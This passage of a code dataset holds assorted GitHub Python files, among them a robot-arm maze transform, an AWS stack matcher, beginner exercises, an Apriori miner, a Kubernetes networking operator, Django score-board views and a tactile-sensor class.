beta_max = armLimit[1][1]\n beta_min = armLimit[1][0]\n\n num_rows = int((alpha_max - alpha_min)/granularity) + 1\n num_cols = int((beta_max - beta_min)/granularity) + 1\n #print(num_rows, num_cols)\n\n map = []\n col= []\n for x in range(num_rows):\n col=[]\n for y in range(num_cols):\n col.append(SPACE_CHAR)\n map.append(col)\n\n theta_x = alpha_min\n theta_y = beta_min\n offsets = (theta_x,theta_y)\n\n start = angleToIdx(start_tmp,offsets,granularity)\n alpha_start = start[0]\n beta_start = start[1]\n start = idxToAngle(start,offsets,granularity)\n alpha_start = start[0]\n beta_start = start[1]\n\n while theta_x <= alpha_max:\n #print(\"theta_x:\", theta_x)\n while theta_y <= beta_max:\n #print(\"theta_y:\",theta_y)\n armAngle = (theta_x,theta_y)\n arm.setArmAngle(armAngle)\n\n coordinate = angleToIdx(armAngle,offsets,granularity)\n # if (doesArmTipTouchGoals(arm.getEnd(),goals)):\n # print True\n print(coordinate[0]+1,coordinate[1]+1,doesArmTouchObjects(arm.getArmPosDist(), goals, True),doesArmTouchObjects(arm.getArmPosDist(), obstacles, False),doesArmTipTouchGoals(arm.getEnd(),goals))\n\n if theta_x == alpha_start and theta_y == beta_start:\n map[coordinate[0]][coordinate[1]] = START_CHAR\n elif doesArmTouchObjects(arm.getArmPosDist(), obstacles, False) and not doesArmTipTouchGoals(arm.getEnd(),goals):\n map[coordinate[0]][coordinate[1]] = WALL_CHAR\n elif doesArmTouchObjects(arm.getArmPosDist(), goals, True) and doesArmTipTouchGoals(arm.getEnd(),goals):\n map[coordinate[0]][coordinate[1]] = OBJECTIVE_CHAR\n elif not isArmWithinWindow(arm.getArmPos(),window):\n map[coordinate[0]][coordinate[1]] = WALL_CHAR\n # else:\n # map[coordinate[0]][coordinate[1]] = SPACE_CHAR\n theta_y +=granularity\n\n theta_y = beta_min\n theta_x +=granularity\n #print(offsets)\n #print(alpha_start,beta_start)\n #print(\"outof loop\")\n maze = Maze(map,offsets,granularity)\n #print(\"done\")\n return maze\n","repo_name":"skang6283/ECE448","sub_path":"mp2/template/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25753619629","text":"import re\n\n\ndef stack_matches(stack_name, search_keyword, exact_match=False):\n # we don't want to delete any frontend stacks\n if re.match('^fe-', stack_name):\n return False\n\n if exact_match:\n regex = re.escape(search_keyword) + r'$'\n return re.search(regex, stack_name)\n else:\n return search_keyword in stack_name\n\n\ndef search_for_matching_stacks(stack_session, stack_keyword, exact_match=False):\n stacks = []\n\n paginator = stack_session.get_paginator('list_stacks')\n response_iterator = paginator.paginate(StackStatusFilter=['CREATE_COMPLETE'])\n for page in response_iterator:\n stacks.extend(filter(lambda s: stack_matches(s['StackName'], stack_keyword, exact_match), page['StackSummaries']))\n\n return stacks\n","repo_name":"ngroesz/utilities","sub_path":"aws/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21127223000","text":"if __name__ == '__main__':\n mapdict =({})\n nestedlist = []\n i=0\n for _ in range(int(input())):\n name = input()\n score = float(input())\n #nestedlist.append([])\n #nestedlist.append[i].append(score)\n #i+=1\n mapdict.update({name:score})\n\n newlist = list(mapdict)\n print (mapdict)\n print (\"new space ________\")\n print (newlist)\n print (\"new space ________\")\n print (nestedlist)\n\n\nif __name__ == '__main__':\n mapdict =({})\n nestedlist = []\n scorelist = []\n marksheet = []\n for _ in range(int(input())):\n name = input()\n score = float(input())\n #nestedlist.append(name)\n #scorelist.append(score)\n marksheet+=[[name,score]]\n scorelist+=[score]\n #nestedlist.append([])\n #nestedlist.append[i].append(score)\n #i+=1\n #mapdict.update({name:score})\n b = sorted(list(set(scorelist)))[1]\n\n for a,c in sorted(marksheet):\n if c==b:\n print(a)\n #scorelist.append(nestedlist)\n #newlist = list(mapdict)\n #print (mapdict)\n #print (\"new space _____newlist___\")\n #print (newlist)\n #print (\"new space ___nestedlist_____\")\n #print (nestedlist)\n #print (\"new space ___scorelist_____\")\n #print (scorelist)\n #print (\"new space ____marksheet___\")\n #print (marksheet)\n #print (\"what is b? \")\n #print (b)\n #print (\"new space ___scorelist[5]____\")\n #print (scorelist[5])\n #print (\"new space ___scorelist[5][0]____\")\n #print (scorelist1)\n \n\n","repo_name":"swordwielder/python3","sub_path":"hackerrank/nestedlist.py","file_name":"nestedlist.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11744640285","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef mu(x):\n y = np.ones(len(x))\n # Select indices of x such that x[i] < 0.\n si = np.where(x < 0)[0]\n y[si] = 0\n\n return y\n\nlo = -2.5\nhi = +2.5\nn_samples = 101\n\nx = np.linspace(lo, hi, n_samples)\n\ndef beta_0(x):\n b0 = mu(x + 1/2)\n b1 = mu(x - 1/2)\n\n return b0 - b1\n\ndef convolve_and_normalize(x, y):\n z = np.convolve(x, y)\n z = z/np.max(z)\n\n return z\n\ndef add_to_plot(y, m, n):\n l = len(y)\n x = np.linspace(0, l, l) - l//2\n\n left = l//4\n right = l - left\n\n plt.plot(x[left:right], y[left:right], label = rf'$\\beta_{m}^{n}$'.format(m, n))\n\n\nbeta_0_1 = beta_0(x)\nbeta_1_1 = convolve_and_normalize(beta_0_1, beta_0_1)\nbeta_2_1 = convolve_and_normalize(beta_1_1, beta_0_1)\nbeta_3_1 = convolve_and_normalize(beta_2_1, beta_0_1)\n\ndef b_m_0(m):\n x = np.zeros(n_samples)\n left = n_samples//2 - m//2\n right = n_samples//2 + m//2\n\n if m % 2 == 1:\n right = right + 1\n\n for i in range(left, right):\n x[i] = 1\n\n return x\n\nb_2_0 = b_m_0(2)\nb_3_2 = np.convolve(np.convolve(np.convolve(b_2_0, b_2_0), b_2_0), beta_3_1)\nb_3_2 = b_3_2/8\n\n","repo_name":"amey-joshi/am","sub_path":"p3/bspline_filter.py","file_name":"bspline_filter.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25178465355","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom score import Score\n\n#------------ SETUP ---------------\nscreen = Screen()\nscreen.setup(width=800, height=600)\nscreen.bgcolor(\"DarkBlue\")\nscreen.title(\"Pong Game\")\nscreen.listen()\nscreen.tracer(0)\ngame_is_on = True\nscore = Score()\n#----------------------------------\n\nleft_paddle = Paddle(-350, 0)\nright_paddle = Paddle(350, 0)\nscreen.tracer(1)\nball = Ball()\n\nscreen.onkey(key=\"w\", fun=left_paddle.up)\nscreen.onkey(key=\"s\", fun=left_paddle.down)\nscreen.onkey(key=\"Up\", fun=right_paddle.up)\nscreen.onkey(key=\"Down\", fun=right_paddle.down)\n\nwhile game_is_on:\n screen.update()\n ball.move()\n \n if ball.ycor() >= 280 or ball.ycor() <= -280:\n ball.bounce()\n if (ball.xcor() > 320 and ball.distance(right_paddle) < 50) or (ball.xcor() < -320 and ball.distance(left_paddle) < 50):\n ball.paddle_hit()\n if ball.xcor() > 380:\n screen.tracer(0)\n ball.reset_pos()\n score.score_up(\"left\")\n if ball.xcor() < -380:\n screen.tracer(0)\n ball.reset_pos()\n score.score_up(\"right\")\n screen.tracer(1)\n\n\n\nscreen.exitonclick()","repo_name":"Tiago-S-Ribeiro/Python-Pro-Bootcamp","sub_path":"100_days_of_code/Intermediate/day_22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32720098242","text":"# Escreva um codigo que leia um mumero de até 4 digitos e consiga determinar\r\n# quantas unidades, dezenas, centenas e\r\n# unidades de milhar o numero tem, e repita enquanto o usuario nao digitar um numero válido\r\n\r\n# while (True):\r\n# numero = input(\"Escreva um número inteiro de até 4 digitos: \")\r\n# if (numero.isnumeric()):\r\n# if (len(numero) <= 4):\r\n# numero = int(numero) # 6575\r\n# m = numero // 1000 # 6\r\n# c = (numero - (1000*m)) // 100 # (6575 - 6000) //100 = 5\r\n# d = ((numero - (1000*m)) - (100*c)) // 10 # 7\r\n# u = (((numero - (1000*m)) - (100*c)) - (10*d)) # 5\r\n# print(f\"\"\"\r\n# Unidades = {u}\r\n# Dezenas = {d}\r\n# Centenas = {c}\r\n# Milhares = {m}\r\n# \"\"\")\r\n# break\r\n# else:\r\n# print(\"Você deve escrever um número de até 4 digitos!\")\r\n# else:\r\n# print(\"Você escreveu digitos que não são números!\")\r\n\r\n# unidades = (\"unidade\",\"dezena\",\"centena\",\"milhar\",\"dezena de milhar\",\"centena de milhar\",\"milhão\")\r\n\r\n# while(True):\r\n\r\n# numero = input(\"Escreva um número inteiro de até 7 digitos: \")\r\n# #numeroInvertido = []\r\n\r\n# if (numero.isnumeric()):\r\n# if (len(numero) <= 7):\r\n\r\n# for i in range(len(numero)):\r\n# print(f\"{unidades[-i-1]} = {numero[i]}\") # 1234567\r\n\r\n# break\r\n\r\n# else:\r\n# print(\"Você deve escrever um número de até 7 digitos!\")\r\n# else:\r\n# print(\"Você digitou algum caractere que não é número.\")\r\n\r\n \r\nnumero = int(input(\"Insira um numero de até 4 digitos: \"))\r\n\r\nresposta = numero\r\n\r\nm = 0\r\nc = 0\r\nd = 0\r\nu = 0\r\n\r\nwhile(resposta!=0):\r\n if(resposta>=1000):\r\n resposta -= 1000\r\n m += 1\r\n elif (resposta>=100):\r\n resposta -= 100\r\n c += 1\r\n elif (resposta>=10):\r\n resposta -= 10\r\n d += 1\r\n elif (resposta>=1):\r\n resposta -= 1\r\n u += 1\r\n else: break\r\n\r\nprint(f\"\"\"Número inicial {numero} \r\nMilhares {m} \r\nCentenas {c}\r\nDezenas {d}\r\nUnidades {u} \"\"\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TarikPonciano/Programador-de-Sistema-SENAC","sub_path":"Programador de Sistemas - UC 1/Repositório de Exemplos/Resolução Olimpiada/equipe4.py","file_name":"equipe4.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"72044893539","text":"'''ZADANIE 6'''\r\n# Napisać program, który pobiera od użytkownika ciąg liczb całkowitych. Pobieranie\r\n# danych kończone jest podaniem wartości 0 (nie wliczana do danych). W następ-\r\n# nej kolejności program powinien wyświetlić sumę największej oraz najmniejszej z\r\n# podanych liczb oraz ich średnią arytmetyczną.\r\n# \r\n# Przykład:\r\n# Użytkownik podał ciąg: 1, -4, 2, 17, 0.\r\n# Wynik programu:\r\n# 13 // suma min. i maks.\r\n# 6.5 // średnia\r\n\r\n'''ROZWIĄZANIE'''\r\n# Function\r\n# Zabezpiecza przed wprowadzeniem wartosci innej niż liczba całkowita\r\n# Tworzy listę\r\ndef load_num(text):\r\n try:\r\n my_num = int(input(text))\r\n except ValueError:\r\n my_num = load_num(\"Błąd. Podaj liczbę całkowitą: \")\r\n return user_list.append(my_num) #Nie ma potrzeby definiowania parametru\r\n# dla listy, bo używamy tylko jednej (więc okreslamy ją z góry).\r\n\r\n# Inputy i zmienne\r\nuser_list = []\r\nuser_num = load_num(\"Podaj liczbę: \")\r\n\r\n# Wykonuje funkcję dopóki użytkownik nie poda 0\r\nwhile not (0 in user_list):\r\n user_num = load_num(\"Podaj liczbę: \")\r\n\r\n# Oczyszcza listę z niepoprawnych wartosci i usuwa 0\r\nwhile None in user_list:\r\n user_list.remove(None)\r\n\r\nuser_list.remove(0)\r\n\r\nprint() # dodaje odstęp\r\n\r\n# Output \r\nuser_sum = min(user_list) + max(user_list)\r\nprint(f\"{user_sum:5} // suma min. i maks.\")\r\n\r\nuser_avg = user_sum / 2\r\nprint(f\"{user_avg:5} // średnia\")\r\n","repo_name":"jarsonX/Learning_Python","sub_path":"_exercises/beginners/in-polish/Zadanie-000006.py","file_name":"Zadanie-000006.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40068018809","text":"import pandas as pd\nimport argparse\nimport sys\nimport time\n\ndef init_apriori(dataset, min_support):\n # Declaring the lists and sets to house the 1-itemset\n list_dataset = dataset.values.tolist()\n first_candid = set()\n\n for row in list_dataset:\n for element in row:\n if not pd.isna(element):\n first_candid.add(element)\n\n first_candid = sorted(first_candid)\n\n # Begin to apply the apriori principle\n count_apriori_list = count_itemsets(list_dataset, first_candid)\n total_trans = len(list_dataset)\n reduce_apriori_list = reduce_itemsets(count_apriori_list, min_support, total_trans)\n\n return reduce_apriori_list, count_apriori_list\n\ndef count_itemsets(list_dataset, candid_list):\n candid_list = list(candid_list)\n count_elem_list = {item: 0 for item in candid_list}\n\n if isinstance(candid_list[0], tuple):\n # Begin to count the occurrences of the k+1 itemset\n for transaction in list_dataset:\n for candidate in candid_list:\n if set(candidate).issubset(set(transaction)):\n count_elem_list[candidate] += 1\n else:\n # Enter this if it is the first time in counting the itemset\n for transaction in list_dataset:\n for candidate in candid_list:\n if pd.isna(candidate):\n continue\n count_elem_list[candidate] += transaction.count(candidate)\n\n return count_elem_list\n\ndef reduce_itemsets(count_itemsets, min_support, total_trans):\n # Reduce the itemsets where the support value does not meet the minimum support value\n frequent_itemsets = {}\n\n for items, item_count in count_itemsets.items():\n if item_count / total_trans >= min_support:\n frequent_itemsets[items] = item_count\n\n return frequent_itemsets\n\ndef generate_candidates(prev_frequent, k):\n # Generates possible new frequent itemsets\n candidates = set()\n\n for prev1 in prev_frequent:\n for prev2 in prev_frequent:\n merged = sorted(list(set(prev1) | set(prev2)))\n\n if len(merged) == k:\n candidates.add(tuple(merged))\n\n return candidates\n\ndef extract_rules(frequent_itemsets, min_confidence):\n # Begin to create the association rules for the known frequent itemsets mined\n rules = []\n\n for items, count in frequent_itemsets.items():\n if len(items) > 1:\n for i in range(len(items)):\n antecedent = list(items[:i]) + list(items[i + 1:])\n precedent = items[i]\n conf = count / frequent_itemsets.get(tuple(antecedent), 1)\n\n if conf >= min_confidence:\n rules.append((antecedent, precedent, conf))\n\n return rules\n\ndef apriori(dataset, min_support, min_confidence):\n # First level candidates\n reduced, counts = init_apriori(dataset, min_support)\n\n # Hold the frequent itemsets and counts\n all_frequent = {tuple([k]): v for k, v in reduced.items()}\n\n k = 2\n\n # Enter this loop if we found initial frequent itemsets\n while True:\n candidates = generate_candidates(all_frequent.keys(), k)\n if not candidates:\n break\n\n count = count_itemsets(dataset.values.tolist(), candidates)\n\n frequent = reduce_itemsets(count, min_support, len(dataset))\n\n if not frequent:\n break\n\n all_frequent.update(frequent)\n k += 1\n\n # Extract association rules\n rules = extract_rules(all_frequent, min_confidence)\n return all_frequent, rules\n\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-s', '--min-support', metavar='float',\n help='Minimum support ratio (must be > 0, default: 0.1).',\n type=float, default=0.1)\n parser.add_argument(\n '-c', '--min-confidence', metavar='float',\n help='Minimum confidence (default: 0.5).',\n type=float, default=0.5)\n parser.add_argument(\n '-f', '--file', metavar='path',\n help='Path to the CSV dataset.',\n required=True)\n\n args = parser.parse_args(argv)\n return args\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n dataset = pd.read_csv(args.file, header=None)\n\n # Sterilizing data in-place\n dataset = dataset.fillna('')\n dataset = dataset.apply(lambda row: [item for item in row if item != ''], axis=1)\n\n print(\"Processing Dataset:\")\n start_apr_time = time.time()\n freq_itemsets, rules = apriori(dataset, args.min_support, args.min_confidence)\n end_apr_time = time.time()\n\n print(\"Transactions:\", dataset.values.tolist())\n\n if not rules:\n print(\"\\nNo association rules could be generated for this dataset.\")\n else:\n print(\"\\nAssociation Rules:\")\n for r in rules:\n print(f\"{r[0]} => {r[1]}, confidence = {r[2]:.2f}\")\n\n elapsed_apr_time = end_apr_time - start_apr_time # Capture compute time\n print(f\"Elapsed Apriori Algorithm Time: {elapsed_apr_time:.6f} seconds\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"colorlikewhite/projects","sub_path":"Apriori Algorithm/AprioriAlgorithm.py","file_name":"AprioriAlgorithm.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15623453500","text":"import random\nimport logging\nfrom kubernetes import client\nfrom mizar.obj.bouncer import Bouncer\nfrom mizar.obj.divider import Divider\nfrom mizar.obj.endpoint import Endpoint\nfrom mizar.common.constants import *\nfrom mizar.common.common import *\nfrom mizar.obj.net import Net\nfrom mizar.store.operator_store import OprStore\n\nlogger = logging.getLogger()\n\n\nclass BouncerOperator(object):\n _instance = None\n\n def __new__(cls, **kwargs):\n if cls._instance is None:\n cls._instance = super(BouncerOperator, cls).__new__(cls)\n cls._init(cls, **kwargs)\n return cls._instance\n\n def _init(self, **kwargs):\n logger.info(kwargs)\n self.store = OprStore()\n load_k8s_config()\n self.obj_api = client.CustomObjectsApi()\n\n def query_existing_bouncers(self):\n logger.info(\"bouncer on_startup\")\n\n def list_bouncers_obj_fn(name, spec, plurals):\n logger.info(\"Bootstrapped Bouncer {}\".format(name))\n b = Bouncer(name, self.obj_api, self.store, spec)\n self.store_update(b)\n\n kube_list_obj(self.obj_api, RESOURCES.droplets, list_bouncers_obj_fn)\n\n def get_bouncer_tmp_obj(self, name, spec):\n return Bouncer(name, self.obj_api, None, spec)\n\n def get_bouncer_stored_obj(self, name, spec):\n return Bouncer(name, self.obj_api, self.store, spec)\n\n def store_update(self, b):\n self.store.update_bouncer(b)\n\n def set_bouncer_provisioned(self, bouncer):\n bouncer.set_status(OBJ_STATUS.bouncer_status_provisioned)\n self.store_update(bouncer)\n bouncer.update_obj()\n\n def update_bouncers_with_divider(self, div, task):\n bouncers = self.store.get_bouncers_of_vpc(div.vpc)\n for b in list(bouncers.values()):\n b.update_vpc(set([div]), task)\n\n def delete_divider_from_bouncers(self, div, task):\n bouncers = self.store.get_bouncers_of_vpc(div.vpc)\n for b in list(bouncers.values()):\n b.update_vpc(set([div]), task, False)\n\n def update_endpoint_with_bouncers(self, ep, task):\n self.update_endpoint_obj_with_bouncers(ep)\n bouncers = self.store.get_bouncers_of_net(ep.net)\n if not bouncers:\n task.raise_temporary_error(\n \"Provisiond EP {}: Bouncers not yet ready!\".format(ep.name))\n eps = set([ep])\n for key in list(bouncers):\n bouncers[key].update_eps(eps, task)\n\n def update_endpoint_obj_with_bouncers(self, ep):\n bouncers = self.store.get_bouncers_of_net(ep.net)\n if ep.type == OBJ_DEFAULTS.ep_type_simple or ep.type == OBJ_DEFAULTS.ep_type_host:\n ep.update_bouncers_list(bouncers)\n\n def delete_endpoint_from_bouncers(self, ep):\n bouncers = self.store.get_bouncers_of_net(ep.net)\n eps = set([ep])\n for key in list(bouncers):\n bouncers[key].delete_eps(eps)\n self.store.update_bouncers_of_net(ep.net, bouncers)\n if ep.type == OBJ_DEFAULTS.ep_type_simple:\n ep.unload_transit_agent_xdp()\n\n def delete_vpc(self, bouncer):\n bouncer.delete_vpc()\n","repo_name":"CentaurusInfra/mizar","sub_path":"mizar/dp/mizar/operators/bouncers/bouncers_operator.py","file_name":"bouncers_operator.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"34"} +{"seq_id":"24917293250","text":"\"\"\" Check PEP257. \"\"\"\n\nfrom .. import Linter as BaseLinter\n\n\nclass Linter(BaseLinter):\n\n \"\"\" Mccabe code complexity. \"\"\"\n\n @staticmethod\n def run(path, code=None, **meta):\n \"\"\" PEP257 code checking.\n\n :return list: List of errors.\n\n \"\"\"\n from .pep257 import PEP257Checker\n\n errors = []\n for er in PEP257Checker().check_source(code, path):\n errors.append(dict(\n lnum=er.line,\n text=er.message,\n type='D',\n ))\n return errors\n","repo_name":"vim-scripts/Python-mode-klen","sub_path":"pymode/libs/pylama/lint/pylama_pep257/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"34"} +{"seq_id":"28438180449","text":"\"\"\"Crie um programa que vai ler vários números e colocar em uma lista.\nDepois disso, crie duas listas extras que vão conter apenas os valores pares e os valores ímpares digitados, respectivamente.\nAo final, mostre o conteúdo das três listas geradas.\"\"\"\nprint(\"Welcome to my program!\\nI'll show to you even and odd numbers\")\nprint('-='*20)\n\nlist = []\neven = []\nodd = []\nwhile True:\n n = int(input('Type a number: '))\n list.append(n)\n if n % 2 == 0:\n even.append(n)\n else:\n odd.append(n)\n stop = str(input('Want continue? [Y/N]')).upper()\n if stop == 'Y':\n continue\n elif stop == 'N':\n break\n else:\n print('Probably you typed wrong, try again:')\nprint(f'The main list is {list}')\nprint(f'The even numbers in list is: {even}')\nprint(f'The odd numbers in list is: {odd}')\nprint('\\nGoodbye!')\n","repo_name":"Luiz-Pericles/Aulas-do-CEV_Python","sub_path":"Exercícios_CEV/Aula 17/Desafio aula 17 - Leia valores e mostre os pares e impares.py","file_name":"Desafio aula 17 - Leia valores e mostre os pares e impares.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30503686150","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, Http404\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils import timezone\nfrom django.template import RequestContext\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import F\n\nfrom tsw.models import *\n\nimport urllib2\nfrom datetime import timedelta\nfrom random import randint\nimport json\nimport math\n\n\ndef _increment_metric(metric, n=0):\n metric_count, created = MetricCount.objects.get_or_create(metric=metric, n=n, defaults={'count': 1})\n if not created:\n metric_count.count = F('count') + 1\n metric_count.save()\n\ndef server_info(request):\n domain = request.GET.get('domain', 'UNKNOWN').strip('/')\n domain = urllib2.unquote(domain) # %20 to space, etc\n version = int(request.GET.get('version', '0').strip('/'))\n # count how many times people hit the shell\n _increment_metric('server_info', version)\n _increment_metric('domain: %s' % domain, version)\n response_data = {\n # base url should not have http, swf url can\n 'base_url': 'www.almostmatt.com/dj/tsw',\n 'swf_url': 'http://www.almostmatt.com/tsw/tsw_v0.swf' # % version\n }\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n@csrf_exempt\ndef log_metric(request):\n #user_id = int(request.POST.get(\"user_id\", 0))\n metric = request.POST.get(\"metric\", 'None')\n n = int(request.POST.get(\"n\", 0))\n #secret_code = int(request.POST.get(\"secret_code\"))\n #try:\n # u = User.objects.get(pk=user_id)\n # if u.secret_code != secret_code:\n # raise PermissionDenied()\n #except User.DoesNotExist:\n # raise PermissionDenied()\n _increment_metric(metric, n)\n response_data = {}\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n@csrf_exempt\ndef new_user(request):\n name = request.POST.get(\"name\", \"\")\n domain = request.POST.get(\"domain\", None)\n referrer = request.META.get('HTTP_REFERER', None)\n\n if name == \"\":\n name = \"Anon%s\" % randint(100, 9999) # duplicates are OK\n _increment_metric(\"anonymous\")\n\n # with shell, shell sets domain and it is passed as an arg\n # with inner, the request comes from where it is hosted\n if referrer and (domain is None or domain.strip(\"/\") == \"\"):\n ref_split = referrer.split(\"//\")\n domain = ref_split[0] if len(ref_split) == 1 else ref_split[1]\n domain = domain.split(\"/\")[0]\n if domain:\n _increment_metric(\"new_user: %s\" % domain.strip(\"/\"))\n\n u = User.objects.create(name=name[:63], create_date=timezone.now(),\n secret_code=randint(0, 1000000000), domain=domain)\n response_data = {\n 'user_id' : u.id,\n 'secret_code' : u.secret_code,\n 'name' : u.name,\n 'create_date' : str(u.create_date),\n }\n response = HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n return response\n\n@csrf_exempt\ndef change_name(request, user_id, name):\n # add a password (or a \"secret\" random number)\n # the user could download all of their best scores and replays if they have password association\n secret_code = int(request.POST.get(\"secret_code\"))\n\n try:\n u = User.objects.get(pk=user_id)\n if u.secret_code != secret_code:\n raise PermissionDenied()\n except User.DoesNotExist:\n raise PermissionDenied()\n\n u.name = name\n u.save()\n response_data = {\n 'user_id' : u.id,\n 'name' : u.name,\n 'create_date' : str(u.create_date)\n }\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\ndef get_domain_update(request):\n user_id = int(request.GET.get(\"user_id\", 0))\n secret_code = int(request.GET.get(\"secret_code\"))\n\n referrer = request.META.get('HTTP_REFERER', None)\n\n if referrer:\n ref_split = referrer.split(\"//\")\n domain = ref_split[0] if len(ref_split) == 1 else ref_split[1]\n domain = domain.split(\"/\")[0]\n\n _increment_metric(\"domain_updated: %s\" % domain.strip(\"/\"))\n\n try:\n u = User.objects.get(pk=user_id)\n if u.secret_code != secret_code:\n raise PermissionDenied()\n # if it is already a good value, leave it as is\n if (u.domain == \"www.almostmatt.com\" or u.domain == \"\" or u.domain == None):\n u.domain = domain\n u.save()\n except User.DoesNotExist:\n raise PermissionDenied()\n\n response_data = {}\n response = HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n return response\n\n","repo_name":"AlmostMatt/ScoreBoard","sub_path":"tsw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7248751861","text":"num = []\nposnum=[]\n\nwhile True:\n print('------- Adicionando Números a Lista----------')\n n1 = int(input('Digite um número: '))\n if(n1 == 999):\n break\n num.append(n1)\nfor c in range(0,len(num)):\n if 2 in num:\n num.remove(2)\n\nprint(num)","repo_name":"Apache0001/Curso-de-Python","sub_path":"Listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70730025378","text":"import numpy, openravepy\n\nclass TactileArray(object):\n def __init__(self, offset, origins, normals):\n self.offset = numpy.array(offset, dtype='float')\n self.origins = numpy.array(origins, dtype='float')\n self.normals = numpy.array(normals, dtype='float')\n\n def __repr__(self):\n return 'TactileArray(offset={0:r}, origins=<{1:d}x{2:d} array>, normals=<{3:d}x{4:d} array>)'.format(\n self.offset, self.origins.shape[0], self.origins.shape[1],\n self.normals.shape[0], self.origins.shape[1])\n\n def __len__(self):\n return self.origins.shape[0]\n\n def get_geometry(self, link_pose):\n offset = self.get_offset(link_pose)\n origins = numpy.dot(offset[0:3, 0:3], self.origins.T) + offset[0:3, 3].reshape((3, 1))\n normals = numpy.dot(offset[0:3, 0:3], self.normals.T)\n return origins.T, normals.T\n\n def get_offset(self, link_pose):\n return numpy.dot(link_pose, self.offset)\n\n @classmethod\n def from_yaml(cls, array_yaml):\n offset_quaternion = numpy.array(array_yaml['offset']['orientation'], dtype='float')\n offset_pose = openravepy.matrixFromQuat(offset_quaternion)\n offset_pose[0:3, 3] = numpy.array(array_yaml['offset']['position'], dtype='float')\n return cls(offset_pose, array_yaml['origin'], array_yaml['normal'])\n\nclass TactileSensor(object):\n def __init__(self):\n self.arrays = dict()\n\n def get_geometry(self, robot):\n all_origins = list()\n all_normals = list()\n\n for link_name, tactile_array in self.arrays.items():\n link_pose = robot.GetLink(link_name).GetTransform()\n array_origins, array_normals = tactile_array.get_geometry(link_pose)\n all_origins.append(array_origins)\n all_normals.append(array_normals)\n\n return numpy.vstack(all_origins), numpy.vstack(all_normals)\n\n def render_values(self, robot, values, scale=1.0, color=None, linewidth=2):\n all_lines = list()\n\n if color is None:\n color = numpy.array([ 1., 0., 0., 1. ])\n\n if isinstance(values, dict):\n all_values = list()\n for link_name in self.arrays.keys():\n all_values.extend(values[link_name])\n else:\n all_values = values\n\n num_cells = len(all_values)\n all_values = numpy.array(all_values, dtype='float')\n origins, normals = self.get_geometry(robot)\n lines = numpy.empty((2 * num_cells, 3))\n lines[0::2, :] = origins\n lines[1::2, :] = origins + scale * all_values.reshape((num_cells, 1)) * normals\n return robot.GetEnv().drawlinelist(lines, linewidth, color)\n\n def render_cells(self, robot, origins=True, normals=True, spheres=True, color=None,\n size=0.0025, linewidth=2, length=0.01):\n if color is None:\n color = numpy.array([ 1., 1., 0., 1. ])\n\n all_origins, all_normals = self.get_geometry(robot)\n handles = list()\n\n if normals:\n lines = numpy.empty((2 * all_origins.shape[0], 3))\n lines[0::2, :] = all_origins\n lines[1::2, :] = all_origins + length * all_normals\n handle = robot.GetEnv().drawlinelist(lines, linewidth, color)\n handles.append(handle)\n\n if spheres:\n handle = robot.GetEnv().plot3(all_origins, size, color, True)\n handles.append(handle)\n\n if origins:\n for tactile_array in self.arrays.values():\n handle = openravepy.misc.DrawAxes(robot.GetEnv(), tactile_array.offset,\n dist=0.02, linewidth=linewidth)\n handles.append(handle)\n\n return handles\n\n @classmethod\n def from_yaml(cls, path):\n # Load the tactile cell origins and normals from YAML.\n with open(path, 'rb') as stream:\n import yaml\n tactile_yaml = yaml.load(stream)\n\n # Create a TactileArray object for each entry in the file.\n sensor = cls()\n for link_name, array_yaml in tactile_yaml.items():\n sensor.arrays[link_name] = TactileArray.from_yaml(array_yaml)\n\n return sensor\n","repo_name":"personalrobotics/prpy","sub_path":"src/prpy/tactile.py","file_name":"tactile.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"34"} +{"seq_id":"70076057377","text":"import 